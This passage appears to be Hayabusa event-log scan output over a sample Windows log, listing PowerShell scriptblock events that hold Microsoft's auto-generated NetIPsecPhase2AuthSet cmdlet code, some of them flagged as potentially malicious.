${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias 
'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
